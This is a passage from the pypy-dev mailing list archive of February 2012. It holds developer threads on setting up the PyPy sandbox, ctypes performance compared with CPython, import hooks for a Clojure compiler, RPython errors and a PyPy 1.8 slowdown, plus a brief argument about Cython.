(lahwran) Date: Sat, 11 Feb 2012 18:02:03 -0700 Subject: [pypy-dev] Unable to get pypy sandbix running In-Reply-To: References: Message-ID: you need to point to the actual file location of pypy-c, such as ../goal/pypy-c. On Sat, Feb 11, 2012 at 5:59 PM, kracekumar ramaraju wrote: > > Hi > > ?I am on ubuntu 11.10 on 32 bit OS. I ran all the procedures to get sanbox > env. > > Now I am unable to run sandboxed interpreter. > > kracekumar at python-lover:~/pypy-pypy-2346207d9946/pypy/translator/sandbox$ ls > autopath.py ? __init__.py ? interact.py ? ? ? rsandbox.py ? sandlib.py > script.py ?vfs.py ? virtualtmp > autopath.pyc ?__init__.pyc ?pypy_interact.py ?rsandbox.pyc ?sandlib.pyc > ?test ? ? ? vfs.pyc > kracekumar at python-lover:~/pypy-pypy-2346207d9946/pypy/translator/sandbox$ ls > virtualtmp/ > script.py > kracekumar at python-lover:~/pypy-pypy-2346207d9946/pypy/translator/sandbox$ > ./pypy_interact.py --tmp=virtualtmp pypy-c /tmp/script.py > ['/bin/pypy-c', '/tmp/script.py'] > Traceback (most recent call last): > ? File "./pypy_interact.py", line 121, in > ? ? tmpdir=tmpdir, debug=debug) > ? File "./pypy_interact.py", line 44, in __init__ > ? ? executable=executable) > ? File > "/home/kracekumar/pypy-pypy-2346207d9946/pypy/translator/sandbox/sandlib.py", > line 423, in __init__ > ? ? super(VirtualizedSandboxedProc, self).__init__(*args, **kwds) > ? File > "/home/kracekumar/pypy-pypy-2346207d9946/pypy/translator/sandbox/sandlib.py", > line 147, in __init__ > ? ? env={}) > ? File "/usr/lib/python2.7/subprocess.py", line 679, in __init__ > ? ? errread, errwrite) > ? File "/usr/lib/python2.7/subprocess.py", line 1239, in _execute_child > ? ? raise child_exception > OSError: [Errno 2] No such file or directory > > Inside sandlib at line no 146, added print args. am i ?missing some thing ? > -- > Thanks & Regards > > "Talk is cheap, show me the code" -- Linus Torvalds > kracekumar > www.kracekumar.com > > > _______________________________________________ > pypy-dev mailing list > pypy-dev at python.org > http://mail.python.org/mailman/listinfo/pypy-dev > From kracethekingmaker at gmail.com Mon Feb 13 04:41:24 2012 From: kracethekingmaker at gmail.com (kracekumar ramaraju) Date: Mon, 13 Feb 2012 09:11:24 +0530 Subject: [pypy-dev] How to add 3rd part libraries to sanboxed environment Message-ID: Hi I am running pypy-1.8 sandboxed one, i created file named `name.py` in current working directory and importing `name.py`, as expected it should fail since sandboxed environment runs on its own file system. sys.path yields ['', '/bin/lib_pypy/__extensions__', '/bin/lib_pypy', '/bin/lib-python/modified-2.7', '/bin/lib-python/2.7', '/bin/lib-python/modified-2.7/lib-tk', '/bin/lib-python/2.7/lib-tk', '/bin/lib-python/2.7/plat-linux2'], os.getcwd() yields /tmp, so how can I install third party packages in the environment, Class package installation will fail I am not wrong. How to proceed further ? -- * Thanks & Regards "Talk is cheap, show me the code" -- Linus Torvalds kracekumar www.kracekumar.com * -------------- next part -------------- An HTML attachment was scrubbed... URL: From arigo at tunes.org Mon Feb 13 10:29:15 2012 From: arigo at tunes.org (Armin Rigo) Date: Mon, 13 Feb 2012 10:29:15 +0100 Subject: [pypy-dev] How to add 3rd part libraries to sanboxed environment In-Reply-To: References: Message-ID: Hi, On Mon, Feb 13, 2012 at 04:41, kracekumar ramaraju wrote: > os.getcwd() yields /tmp, so how can I install third party packages in the > environment, Class package installation will fail I am not wrong. You are on your own in this custom environment. Just put the package you want to install inside the directory that will become '/tmp'. (That's not really /tmp, but instead the directory you specify wiht --tmp=DIR.) A bient?t, Armin. From frans.dejong48 at gmail.com Mon Feb 13 10:19:28 2012 From: frans.dejong48 at gmail.com (Frans) Date: Mon, 13 Feb 2012 10:19:28 +0100 Subject: [pypy-dev] error Message-ID: Hi, After an error report and a succesfull slicing and print yesterday there is another eerror report. I am curious to the fix. -- *Met vriendelijke groeten, kind Regards* * * *Frans* -------------- next part -------------- An HTML attachment was scrubbed... URL: -------------- next part -------------- A non-text attachment was scrubbed... Name: Fatal RPython error.odt Type: application/vnd.oasis.opendocument.text Size: 248142 bytes Desc: not available URL: From fijall at gmail.com Mon Feb 13 10:42:32 2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Mon, 13 Feb 2012 11:42:32 +0200 Subject: [pypy-dev] error In-Reply-To: References: Message-ID: On Mon, Feb 13, 2012 at 11:19 AM, Frans wrote: > Hi, > After an error report and a succesfull slicing and print yesterday there is > another eerror report. > I am curious to the fix. Hi Frans. Can you tell us how to reproduce the problem? From amauryfa at gmail.com Mon Feb 13 10:51:24 2012 From: amauryfa at gmail.com (Amaury Forgeot d'Arc) Date: Mon, 13 Feb 2012 10:51:24 +0100 Subject: [pypy-dev] error In-Reply-To: References: Message-ID: 2012/2/13 Frans > Hi, > After an error report and a succesfull slicing and print yesterday there > is another eerror report. > I am curious to the fix. > And for people who cannot open .odt files, the console contains: Skeinforge settings have been saved. You do not have Tkinter, which is needed for the graphical interface. you will only be able to use the command line. Information on how to download Tkinter is at: www.tcl.tk/software/tcltk/ File E:/ProgramData/FABlab/Ultimaker/STL-files/hot end revisie/Base_and_Riser_2.stl is being chain exported. Preface procedure took 19 seconds. Inset procedure took 21 seconds. Fill procedure took 40 seconds. Multiply procedure took 4 seconds. Speed procedure took 2 seconds. I Temperature procedure took 1 second. RPython traceback: File "jit_metainterp_optimizeopt_optimizer.c", line 8718, in get_constant_box__pypy_jit_metainterp_optimizeop File "jit_metainterp_optimizeopt_unroll.c", line 25888, in UnrollableOptimizer_ensure_imported File "jit_metainterp_optimizeopt_optimizer.c", line 10079, in OptValue_import_from Fatal RPython error: AssertionError This application has requested the Runtime to terminate it in an unusual way. Please contact the application's support team for more information. -- Amaury Forgeot d'Arc -------------- next part -------------- An HTML attachment was scrubbed... URL: From arigo at tunes.org Mon Feb 13 11:17:34 2012 From: arigo at tunes.org (Armin Rigo) Date: Mon, 13 Feb 2012 11:17:34 +0100 Subject: [pypy-dev] error In-Reply-To: References: Message-ID: Hi Frans, Thank you, but we need to know at least: - the version of PyPy (is it the official PyPy 1.8?); - the program that is started (and how to install it, if complicated); - and for reference, the OS --- I guess Windows from the dump of Amaury. Also, I don't find yesterday's conversation with you. Can you explain where it was (nickname if on IRC, etc.)? A bient?t, Armin. From sebastien.volle at gmail.com Mon Feb 13 13:33:04 2012 From: sebastien.volle at gmail.com (=?ISO-8859-1?Q?S=E9bastien_Volle?=) Date: Mon, 13 Feb 2012 13:33:04 +0100 Subject: [pypy-dev] ctypes - PyPy 1.8 slower than Python 2.6.5 Message-ID: Hi all, My team is working on a project of fast packet sniffers and I'm comparing performance between different languages. So, we came up with a simple ARP sniffer that I ported to Python using ctypes. During my investigations, I turned out that using ctypes, PyPy 1.8 is 4x slower than CPython 2.6.5. After looking at the PyPy buglist, it's seems there are couple open issues about ctypes so I figured I would ask you guys first before filing a new bug. I'm pretty new to ctypes and pypy so I'm not sure I understand what's going. My program seems to spend a lot of time in ctypes/function.py:_convert_args though, has the following profile trace demonstrates: $ pypy -m cProfile -s time arp.py Packet buffer now at 0x9CCECB2 Capture started elapsed time : 3983.84ms Total packets : 35571 packets/s : 8928.81 7839198 function calls (7838340 primitive calls) in 4.105 seconds Ordered by: internal time ncalls tottime percall cumtime percall filename:lineno(function) 69876 0.546 0.000 1.584 0.000 function.py:480(_convert_args) 214696 0.256 0.000 0.429 0.000 structure.py:236(_subarray) 1052195 0.206 0.000 0.206 0.000 {isinstance} 632437 0.192 0.000 0.192 0.000 {method 'append' of 'list' objects} 175326 0.187 0.000 0.407 0.000 function.py:350(_call_funcptr) 1 0.173 0.173 4.105 4.105 arp.py:1() 209628 0.158 0.000 0.587 0.000 primitive.py:272(from_param) 214696 0.149 0.000 0.963 0.000 structure.py:90(__get__) 71144 0.143 0.000 0.198 0.000 structure.py:216(__new__) 106713 0.130 0.000 0.208 0.000 array.py:70(_CData_output) 105450 0.124 0.000 2.281 0.000 function.py:689(__call__) 69876 0.123 0.000 1.943 0.000 function.py:278(__call__) 321412 0.102 0.000 0.102 0.000 {method 'fromaddress' of 'Array' objects} 209628 0.088 0.000 0.811 0.000 function.py:437(_conv_param) 179125 0.083 0.000 0.083 0.000 {method 'fieldaddress' of 'StructureInstance' objects} 69883 0.080 0.000 0.122 0.000 primitive.py:308(__init__) 71142 0.076 0.000 0.320 0.000 structure.py:174(from_address) 105450 0.075 0.000 0.145 0.000 function.py:593(_build_result) 139755 0.072 0.000 0.120 0.000 primitive.py:64(generic_xxx_p_from_param) 107983 0.070 0.000 0.125 0.000 basics.py:60(_CData_output) 209828 0.062 0.000 0.062 0.000 {method 'get' of 'dict' objects} 107986 0.055 0.000 0.055 0.000 {method '__new__' of '_ctypes.primitive.SimpleType' objects} 71142 0.052 0.000 0.372 0.000 pointer.py:77(getcontents) 35578 0.052 0.000 0.125 0.000 pointer.py:62(__init__) 35576 0.050 0.000 0.062 0.000 pointer.py:83(setcontents) 106713 0.047 0.000 0.047 0.000 {method '__new__' of '_ctypes.array.ArrayMeta' objects} 139750 0.043 0.000 0.181 0.000 primitive.py:84(from_param_void_p) 209625 0.043 0.000 0.691 0.000 basics.py:50(get_ffi_param) 283592/283435 0.041 0.000 0.041 0.000 {len} 71144 0.040 0.000 0.040 0.000 {method '__new__' of '_ctypes.structure.StructOrUnionMeta' objects} 105450 0.039 0.000 0.039 0.000 {method 'free_temp_buffers' of '_ffi.FuncPtr' objects} 176683 0.037 0.000 0.037 0.000 {hasattr} 35571 0.037 0.000 0.423 0.000 pcap.py:89(next) Anyway, I attached my full project to this mail, including a sample pcap capture file. It requires libpcap to be installed on your system. Run arp.py to run the sniffer on the included demo.pcap capture file. I realize I should try and narrow down the issue some more, but I can't really afford to spend too much time on this right now so hopefully, this will be a least a bit helpful. Thanks! Regards, S?bastien -------------- next part -------------- An HTML attachment was scrubbed... URL: -------------- next part -------------- A non-text attachment was scrubbed... Name: ctypes-test.tar.bz2 Type: application/x-bzip2 Size: 242538 bytes Desc: not available URL: From sebastien.volle at gmail.com Mon Feb 13 13:41:55 2012 From: sebastien.volle at gmail.com (=?ISO-8859-1?Q?S=E9bastien_Volle?=) Date: Mon, 13 Feb 2012 13:41:55 +0100 Subject: [pypy-dev] ctypes - PyPy 1.8 slower than Python 2.6.5 In-Reply-To: References: Message-ID: I'm running this on Ubuntu Lucid Lynx 32 bits by the way. Regards, S?bastien 2012/2/13 S?bastien Volle > Hi all, > > My team is working on a project of fast packet sniffers and I'm comparing > performance between different languages. > So, we came up with a simple ARP sniffer that I ported to Python using > ctypes. > > During my investigations, I turned out that using ctypes, PyPy 1.8 is > 4x slower than CPython 2.6.5. > After looking at the PyPy buglist, it's seems there are couple open issues > about ctypes so I figured I would ask you guys first before filing a new > bug. > > I'm pretty new to ctypes and pypy so I'm not sure I understand what's > going. My program seems to spend a lot of time in > ctypes/function.py:_convert_args though, has the following profile trace > demonstrates: > > $ pypy -m cProfile -s time arp.py > Packet buffer now at 0x9CCECB2 > Capture started > elapsed time : 3983.84ms > Total packets : 35571 > packets/s : 8928.81 > > 7839198 function calls (7838340 primitive calls) in 4.105 seconds > > Ordered by: internal time > > ncalls tottime percall cumtime percall filename:lineno(function) > 69876 0.546 0.000 1.584 0.000 > function.py:480(_convert_args) > 214696 0.256 0.000 0.429 0.000 structure.py:236(_subarray) > 1052195 0.206 0.000 0.206 0.000 {isinstance} > 632437 0.192 0.000 0.192 0.000 {method 'append' of 'list' > objects} > 175326 0.187 0.000 0.407 0.000 > function.py:350(_call_funcptr) > 1 0.173 0.173 4.105 4.105 arp.py:1() > 209628 0.158 0.000 0.587 0.000 primitive.py:272(from_param) > 214696 0.149 0.000 0.963 0.000 structure.py:90(__get__) > 71144 0.143 0.000 0.198 0.000 structure.py:216(__new__) > 106713 0.130 0.000 0.208 0.000 array.py:70(_CData_output) > 105450 0.124 0.000 2.281 0.000 function.py:689(__call__) > 69876 0.123 0.000 1.943 0.000 function.py:278(__call__) > 321412 0.102 0.000 0.102 0.000 {method 'fromaddress' of > 'Array' objects} > 209628 0.088 0.000 0.811 0.000 function.py:437(_conv_param) > 179125 0.083 0.000 0.083 0.000 {method 'fieldaddress' of > 'StructureInstance' objects} > 69883 0.080 0.000 0.122 0.000 primitive.py:308(__init__) > 71142 0.076 0.000 0.320 0.000 > structure.py:174(from_address) > 105450 0.075 0.000 0.145 0.000 > function.py:593(_build_result) > 139755 0.072 0.000 0.120 0.000 > primitive.py:64(generic_xxx_p_from_param) > 107983 0.070 0.000 0.125 0.000 basics.py:60(_CData_output) > 209828 0.062 0.000 0.062 0.000 {method 'get' of 'dict' > objects} > 107986 0.055 0.000 0.055 0.000 {method '__new__' of > '_ctypes.primitive.SimpleType' objects} > 71142 0.052 0.000 0.372 0.000 pointer.py:77(getcontents) > 35578 0.052 0.000 0.125 0.000 pointer.py:62(__init__) > 35576 0.050 0.000 0.062 0.000 pointer.py:83(setcontents) > 106713 0.047 0.000 0.047 0.000 {method '__new__' of > '_ctypes.array.ArrayMeta' objects} > 139750 0.043 0.000 0.181 0.000 > primitive.py:84(from_param_void_p) > 209625 0.043 0.000 0.691 0.000 basics.py:50(get_ffi_param) > 283592/283435 0.041 0.000 0.041 0.000 {len} > 71144 0.040 0.000 0.040 0.000 {method '__new__' of > '_ctypes.structure.StructOrUnionMeta' objects} > 105450 0.039 0.000 0.039 0.000 {method 'free_temp_buffers' > of '_ffi.FuncPtr' objects} > 176683 0.037 0.000 0.037 0.000 {hasattr} > 35571 0.037 0.000 0.423 0.000 pcap.py:89(next) > > > Anyway, I attached my full project to this mail, including a sample pcap > capture file. It requires libpcap to be installed on your system. Run > arp.py to run the sniffer on the included demo.pcap capture file. > I realize I should try and narrow down the issue some more, but I can't > really afford to spend too much time on this right now so hopefully, this > will be a least a bit helpful. > > Thanks! > > Regards, > S?bastien > -------------- next part -------------- An HTML attachment was scrubbed... URL: From anto.cuni at gmail.com Mon Feb 13 14:13:02 2012 From: anto.cuni at gmail.com (Antonio Cuni) Date: Mon, 13 Feb 2012 14:13:02 +0100 Subject: [pypy-dev] ctypes - PyPy 1.8 slower than Python 2.6.5 In-Reply-To: References: Message-ID: <4F390C5E.4060802@gmail.com> Hello S?bastien, On 02/13/2012 01:33 PM, S?bastien Volle wrote: > During my investigations, I turned out that using ctypes, PyPy 1.8 is > 4x slower than CPython 2.6.5. > After looking at the PyPy buglist, it's seems there are couple open issues > about ctypes so I figured I would ask you guys first before filing a new bug. > > I'm pretty new to ctypes and pypy so I'm not sure I understand what's going. > My program seems to spend a lot of time in ctypes/function.py:_convert_args > though, has the following profile trace demonstrates: this is indeed a problem (or, better, a missing feature) in pypy's ctypes implementation. PyPy can make ctypes calls fast only in a set of "supported cases": in that case, ctypes calls take a fast path which is actually very fast, while in all the others it takes a slow path which is actually very slow :-/. I looked at your code and I realized that there is one common case in which we fail to take the fast path, and this happens when we pass a ctypes array to a function which expects a pointer. This means that in your code all the calls to c.memcmp are slow. This is something that we should really fix. In the meantime, you can work around the issue by manually casting the array to a c_void_p before calling the function; e.g.:: xx = cast(offset_eth.dst, c_void_p) yy = cast(eth_brd, c_void_p) if c.memcmp(xx, yy, 6) != 0: In addition, I should point out that both in pypy and cpython the code executed inside functions is much faster than the code executed at module level: so, I put most of the code in arp.py inside a function called main(), which is then called and timed. You can find my quickly hacked arp.py attached here. With my changes, it now takes 0.13ms vs 440.5ms on CPython, and 0.77ms vs 1092.71ms on PyPy. On this particular test CPython is still faster than PyPy, however it might simply be that the JIT doesn't have enough time to warmup. Could you please try it on a larger cap file so that it runs at least for e.g. 5 seconds? ciao, Anto -------------- next part -------------- A non-text attachment was scrubbed... Name: arp.py Type: text/x-python Size: 5444 bytes Desc: not available URL: From tbaldridge at gmail.com Mon Feb 13 15:18:13 2012 From: tbaldridge at gmail.com (Timothy Baldridge) Date: Mon, 13 Feb 2012 08:18:13 -0600 Subject: [pypy-dev] replacing/modifying __import__ Message-ID: I'm in the process of writing a Clojure->Python bytecode compiler (http://github.com/halgari/clojure-py). The project is going quite well and runs great on PyPy and CPython. However there is one feature I'm not quite sure how to implement in PyPy. What I would like, is to extend 'import' so that it can handle .clj files: import clojure.core # where there is a file called clojure/core.clj Now in CPython I can simply ovewrite __builtins__.__import__ with a new function that adds additional functionality to __import__. However, in PyPy we can't change __builtins__. So is there a better option? The interop between clojure and python is so good already, that I'd hate to make users run: import clojure clojure.import("core.clj") Any ideas? Thanks, Timothy -- ?One of the main causes of the fall of the Roman Empire was that?lacking zero?they had no way to indicate successful termination of their C programs.? (Robert Firth) From sebastien.volle at gmail.com Mon Feb 13 15:22:08 2012 From: sebastien.volle at gmail.com (=?ISO-8859-1?Q?S=E9bastien_Volle?=) Date: Mon, 13 Feb 2012 15:22:08 +0100 Subject: [pypy-dev] ctypes - PyPy 1.8 slower than Python 2.6.5 In-Reply-To: <4F390C5E.4060802@gmail.com> References: <4F390C5E.4060802@gmail.com> Message-ID: Thank you for your help Antonio. It seems a little indentation problem in the modified arp.py file you attached makes the main() loop to return after a single packet. I attached the updated version. The actual new figures are: CPython: ~580ms (~310ms with initial version) PyPy: ~1120ms (~1300ms with initial version) So, the manual cast of array to c_void_p makes the program around 2x slower on CPython, and only marginally faster on PyPy. PyPy spends now most its time in pointer.py:_cast_addr(). I might try with a bigger pcap file and try to investigate a bit on my own when I get the occasion. On a related note, I wish I could just use the pcapy module for this particular project, which is actually way faster than ctypes wrappers, at least with CPython, but it doesn't build for pypy (missing things in sysconfig I believe). Thank you for your time. Regards, S?bastien 2012/2/13 Antonio Cuni > Hello S?bastien, > > > On 02/13/2012 01:33 PM, S?bastien Volle wrote: > > During my investigations, I turned out that using ctypes, PyPy 1.8 is >> 4x slower than CPython 2.6.5. >> After looking at the PyPy buglist, it's seems there are couple open issues >> about ctypes so I figured I would ask you guys first before filing a new >> bug. >> >> I'm pretty new to ctypes and pypy so I'm not sure I understand what's >> going. >> My program seems to spend a lot of time in ctypes/function.py:_convert_** >> args >> though, has the following profile trace demonstrates: >> > > this is indeed a problem (or, better, a missing feature) in pypy's ctypes > implementation. > > PyPy can make ctypes calls fast only in a set of "supported cases": in > that case, ctypes calls take a fast path which is actually very fast, while > in all the others it takes a slow path which is actually very slow :-/. > > I looked at your code and I realized that there is one common case in > which we fail to take the fast path, and this happens when we pass a ctypes > array to a function which expects a pointer. This means that in your code > all the calls to c.memcmp are slow. > > This is something that we should really fix. In the meantime, you can work > around the issue by manually casting the array to a c_void_p before calling > the function; e.g.:: > > xx = cast(offset_eth.dst, c_void_p) > yy = cast(eth_brd, c_void_p) > if c.memcmp(xx, yy, 6) != 0: > > In addition, I should point out that both in pypy and cpython the code > executed inside functions is much faster than the code executed at module > level: so, I put most of the code in arp.py inside a function called > main(), which is then called and timed. > > You can find my quickly hacked arp.py attached here. With my changes, it > now takes 0.13ms vs 440.5ms on CPython, and 0.77ms vs 1092.71ms on PyPy. > > On this particular test CPython is still faster than PyPy, however it > might simply be that the JIT doesn't have enough time to warmup. Could you > please try it on a larger cap file so that it runs at least for e.g. 5 > seconds? > > ciao, > Anto > -------------- next part -------------- An HTML attachment was scrubbed... URL: -------------- next part -------------- A non-text attachment was scrubbed... Name: arp.py Type: application/octet-stream Size: 5622 bytes Desc: not available URL: From stefan_ml at behnel.de Mon Feb 13 15:29:07 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Mon, 13 Feb 2012 15:29:07 +0100 Subject: [pypy-dev] ctypes - PyPy 1.8 slower than Python 2.6.5 In-Reply-To: References: Message-ID: S?bastien Volle, 13.02.2012 13:33: > My team is working on a project of fast packet sniffers and I'm comparing > performance between different languages. > So, we came up with a simple ARP sniffer that I ported to Python using > ctypes. If performance is important to you, you may want to write the wrapper for Python in Cython instead (and maybe also parts of the filtering code, which I assume your program to be about). Stefan From amauryfa at gmail.com Mon Feb 13 15:42:30 2012 From: amauryfa at gmail.com (Amaury Forgeot d'Arc) Date: Mon, 13 Feb 2012 15:42:30 +0100 Subject: [pypy-dev] replacing/modifying __import__ In-Reply-To: References: Message-ID: 2012/2/13 Timothy Baldridge > I'm in the process of writing a Clojure->Python bytecode compiler > (http://github.com/halgari/clojure-py). The project is going quite > well and runs great on PyPy and CPython. However there is one feature > I'm not quite sure how to implement in PyPy. What I would like, is to > extend 'import' so that it can handle .clj files: > > import clojure.core # where there is a file called clojure/core.clj > > Now in CPython I can simply ovewrite __builtins__.__import__ with a > new function that adds additional functionality to __import__. > However, in PyPy we can't change __builtins__. So is there a better > option? The interop between clojure and python is so good already, > that I'd hate to make users run: > > import clojure > clojure.import("core.clj") > > Any ideas? > Have you tried with an import hook? sys.path_hooks is a list of callables tried to handle a sys.path item. For example, the zipimporter is already implemented as a path_hook, it catches sys.path entries that ends with ".zip". You could design a clojureimporter that would handle any entry in sys.path which ends with "/closure" (or better, which have a __init__.clj file) There is also sys.meta_path, which can be used for further customization, and may be needed if you want to have both .py and .cjl files in the same directory. Both kinds of hooks are normally supported by both CPython and PyPy... -- Amaury Forgeot d'Arc -------------- next part -------------- An HTML attachment was scrubbed... URL: From arigo at tunes.org Mon Feb 13 15:50:45 2012 From: arigo at tunes.org (Armin Rigo) Date: Mon, 13 Feb 2012 15:50:45 +0100 Subject: [pypy-dev] replacing/modifying __import__ In-Reply-To: References: Message-ID: Hi Timothy, On Mon, Feb 13, 2012 at 15:18, Timothy Baldridge wrote: > Now in CPython I can simply ovewrite __builtins__.__import__ with a > new function that adds additional functionality to __import__. > However, in PyPy we can't change __builtins__. Why not? You're probably just confused about __builtin__ versus __builtins__. Don't use the latter, even in CPython, because it only works half of the time. It is documented as an internal detail. Always do "import __builtin__" instead. A bient?t, Armin. From kracethekingmaker at gmail.com Mon Feb 13 18:38:31 2012 From: kracethekingmaker at gmail.com (kracekumar ramaraju) Date: Mon, 13 Feb 2012 23:08:31 +0530 Subject: [pypy-dev] Socket module fails in pypy1.8 Message-ID: Hi kracekumar at python-lover:~/pypy-pypy-2346207d9946/pypy/translator/sandbox$ pypy1.7 pypy_interact.py --tmp=virtualtmp/ ../../../pypy-c ['/bin/pypy-c'] Warning: cannot find your CPU L2 cache size in /proc/cpuinfo Not Implemented: SomeString(no_nul=True) RuntimeError 'import site' failed Python 2.7.2 (2346207d99463f299f09f3e151c9d5fa9158f71b, Feb 11 2012, 23:26:49) [PyPy 1.8.0 with GCC 4.6.1] on linux2 Type "help", "copyright", "credits" or "license" for more information. And now for something completely different: ``PyPy is not a real VM: no segfault handlers to do the rare cases'' >>>> import socket Traceback (most recent call last): File "", line 1, in File "/bin/lib-python/modified-2.7/socket.py", line 47, in import _socket ImportError: No module named _socket >>>> It seems _socket module is undefined, I checked in lib-python/modified-2.7 and couldnot locate _socket module. -- * Thanks & Regards "Talk is cheap, show me the code" -- Linus Torvalds kracekumar www.kracekumar.com * -------------- next part -------------- An HTML attachment was scrubbed... URL: From fijall at gmail.com Mon Feb 13 19:44:07 2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Mon, 13 Feb 2012 20:44:07 +0200 Subject: [pypy-dev] ctypes - PyPy 1.8 slower than Python 2.6.5 In-Reply-To: References: Message-ID: On Mon, Feb 13, 2012 at 4:29 PM, Stefan Behnel wrote: > S?bastien Volle, 13.02.2012 13:33: >> My team is working on a project of fast packet sniffers and I'm comparing >> performance between different languages. >> So, we came up with a simple ARP sniffer that I ported to Python using >> ctypes. > > If performance is important to you, you may want to write the wrapper for > Python in Cython instead (and maybe also parts of the filtering code, which > I assume your program to be about). > > Stefan Hi Stefan I appreciate your willingness to advertise cython wherever it's possible, but this is simply not on topic on the current thread. Cython is not a panacea for all woes and it's actually slower than pypy on most cases that don't involve calling C. It's also slower even when you provide direct type annotations, so you have a pretty reasonable usecase for pypy even in cases where calling C is a problem. Also, we're going to attack those ctypes problems. If you wish to respond to my mail, please put it into a post that has a different title and not hijack all the discussions with cython. Thank you, fijal From laurentvaucher at gmail.com Mon Feb 13 19:50:41 2012 From: laurentvaucher at gmail.com (Laurent Vaucher) Date: Mon, 13 Feb 2012 19:50:41 +0100 Subject: [pypy-dev] PyPy 1.8 50% slower than PyPy 1.7 on my test case Message-ID: Hi and first of all, thanks for that great project. Now to my "problem". I'm doing some puzzle-solving, constraint processing with Python and on my particular program, PyPy 1.8 showed a 50% increase in running time over PyPy 1.7. I'm not doing anything fancy (no numpy, itertools, etc.). The program is here: https://github.com/slowfrog/hexiom To reproduce: - fetch hexiom2.py and level36.txt from github - run 'pypy hexiom2.py -sfirst level36.txt' On my machine (Windows 7) the timings are the following: Python 2.6.5/Windows 32 3m35s Python 2.7.1 (930f0bc4125a, Nov 27 2011, 11:58:57) [PyPy 1.7.0 with MSC v.1500 32 bit] 31s Python 2.7.2 (0e28b379d8b3, Feb 09 2012, 18:31:47) [PyPy 1.8.0 with MSC v.1500 32 bit] 48s I'm using the default options. Do you have any idea what could be causing that? Thanks, Laurent. -------------- next part -------------- An HTML attachment was scrubbed... URL: From fijall at gmail.com Mon Feb 13 19:59:48 2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Mon, 13 Feb 2012 20:59:48 +0200 Subject: [pypy-dev] Socket module fails in pypy1.8 In-Reply-To: References: Message-ID: On Mon, Feb 13, 2012 at 7:38 PM, kracekumar ramaraju wrote: > Hi > > ?kracekumar at python-lover:~/pypy-pypy-2346207d9946/pypy/translator/sandbox$ > pypy1.7 pypy_interact.py --tmp=virtualtmp/ ../../../pypy-c > ['/bin/pypy-c'] > Warning: cannot find your CPU L2 cache size in /proc/cpuinfo > Not Implemented: SomeString(no_nul=True) > RuntimeError > 'import site' failed > Python 2.7.2 (2346207d99463f299f09f3e151c9d5fa9158f71b, Feb 11 2012, > 23:26:49) > [PyPy 1.8.0 with GCC 4.6.1] on linux2 > Type "help", "copyright", "credits" or "license" for more information. > And now for something completely different: ``PyPy is not a real VM: no > segfault handlers to do the rare cases'' >>>>> import socket > Traceback (most recent call last): > ? File "", line 1, in > ? File "/bin/lib-python/modified-2.7/socket.py", line 47, in > ? ? import _socket > ImportError: No module named _socket >>>>> > > It seems _socket module is undefined, I checked in lib-python/modified-2.7 > and couldnot locate _socket module. > > -- > Thanks & Regards > > "Talk is cheap, show me the code" -- Linus Torvalds > kracekumar > www.kracekumar.com > > > _______________________________________________ > pypy-dev mailing list > pypy-dev at python.org > http://mail.python.org/mailman/listinfo/pypy-dev > Sandboxed version does not support sockets. From stefan_ml at behnel.de Mon Feb 13 20:37:13 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Mon, 13 Feb 2012 20:37:13 +0100 Subject: [pypy-dev] offtopic, ontopic, ... (was: ctypes - PyPy 1.8 slower than Python 2.6.5) In-Reply-To: References: Message-ID: Maciej Fijalkowski, 13.02.2012 19:44: > On Mon, Feb 13, 2012 at 4:29 PM, Stefan Behnel wrote: >> S?bastien Volle, 13.02.2012 13:33: >>> My team is working on a project of fast packet sniffers and I'm comparing >>> performance between different languages. >>> So, we came up with a simple ARP sniffer that I ported to Python using >>> ctypes. >> >> If performance is important to you, you may want to write the wrapper for >> Python in Cython instead (and maybe also parts of the filtering code, which >> I assume your program to be about). > > I appreciate your willingness to advertise cython wherever it's > possible, but this is simply not on topic on the current thread. S?bastien Volle replied to my mail telling me that their current approach was actually based on LuaJIT and its native FFI, and that he was mostly comparing that to other languages (which all loose thoroughly in the competition, BTW). That makes Cython on-topic for him at least. I also find Cython generally *very* on-topic when the intention is to interface Python code with C code, especially when performance and/or ease of use are part of the requirements. In terms of features and comfort, ctypes is still a bit too far behind the user experience that Cython has to offer. Given how important Cython has become for the Python ecosystem in many regards, it's sad that PyPy still doesn't have it available. From what I hear, that's a serious blocker to some users. (Or should I say "most users"?) > Cython is not a panacea for all woes Well, what is? > and it's actually slower than > pypy on most cases that don't involve calling C. It's also slower even > when you provide direct type annotations Ah, "most cases", hm? How is that for a well founded statement? What are you using for comparison? speed.pypy.org? Have you noticed that amongst all those benchmarks there that PyPy was specifically tuned for, there is not a single benchmark that was selected specifically for Cython? There are always lies, damn lies and then there are benchmarks, don't forget that. > so you have a pretty > reasonable usecase for pypy even in cases where calling C is a > problem. Also, we're going to attack those ctypes problems. Since when is "we can do that, too" synonymous with "there are no alternatives"? World domination seems an attractive goal to go after, but it's pretty boring in the long run. Besides, "going to attack" admits that you're not there yet. Cython has been there for a couple of years now, it solves real problems that real users have today, and it's constantly getting better in doing so, because it's being designed and developed to solve those problems. It may not be obvious to you, but PyPy isn't a panacea either. > If you wish to respond to my mail, please put it into a post that has > a different title and not hijack all the discussions with cython. Ok, done. BTW, what are those show-off mails meant for that you keep sending to python-dev on each PyPy release? Do you really consider them on-topic for the development of the CPython runtime, or even just the Python language? Food for thought ... Stefan From faassen at startifact.com Mon Feb 13 21:16:42 2012 From: faassen at startifact.com (Martijn Faassen) Date: Mon, 13 Feb 2012 21:16:42 +0100 Subject: [pypy-dev] offtopic, ontopic, ... (was: ctypes - PyPy 1.8 slower than Python 2.6.5) In-Reply-To: References: Message-ID: Hi Stefan, others, I've recommended to Maciej to take this discussion off-list with Stefan. I think a few mailing list etiquette mistakes were made in this discussion so far. I don't think this is worth a flame war and it's in my interest if you both work it out - Stefan's contributions added to Maciej's might make PyPy even better in the long run. Thanks, Martijn From fijall at gmail.com Mon Feb 13 21:41:27 2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Mon, 13 Feb 2012 22:41:27 +0200 Subject: [pypy-dev] offtopic, ontopic, ... (was: ctypes - PyPy 1.8 slower than Python 2.6.5) In-Reply-To: References: Message-ID: On Mon, Feb 13, 2012 at 9:37 PM, Stefan Behnel wrote: > Maciej Fijalkowski, 13.02.2012 19:44: >> On Mon, Feb 13, 2012 at 4:29 PM, Stefan Behnel wrote: >>> S?bastien Volle, 13.02.2012 13:33: >>>> My team is 